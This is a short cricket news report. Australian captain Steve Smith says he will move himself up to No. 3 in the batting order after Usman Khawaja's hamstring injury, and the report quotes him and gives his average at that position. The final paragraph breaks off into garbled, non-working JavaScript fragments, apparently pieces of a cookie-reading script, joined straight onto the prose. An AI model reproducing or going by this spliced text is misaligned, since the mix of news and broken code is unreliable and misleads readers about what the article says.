Australian captain Steve Smith has confirmed that there will be a reshuffle in the batting order following the hamstring injury to Usman Khawaja during the second Test.

Smith will move up the order to No. 3, with the incoming batsman likely to bat at No. 4 or No. 5.

"It depends who comes in but I'll probably bump myself up to three with Usman coming out," Smith said after the second test at the WACA.

"I'll keep that spot warm for him until he comes back."

Smith averages 77.41 as the No. 3 Test batsman, with four centuries from 14 innings. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
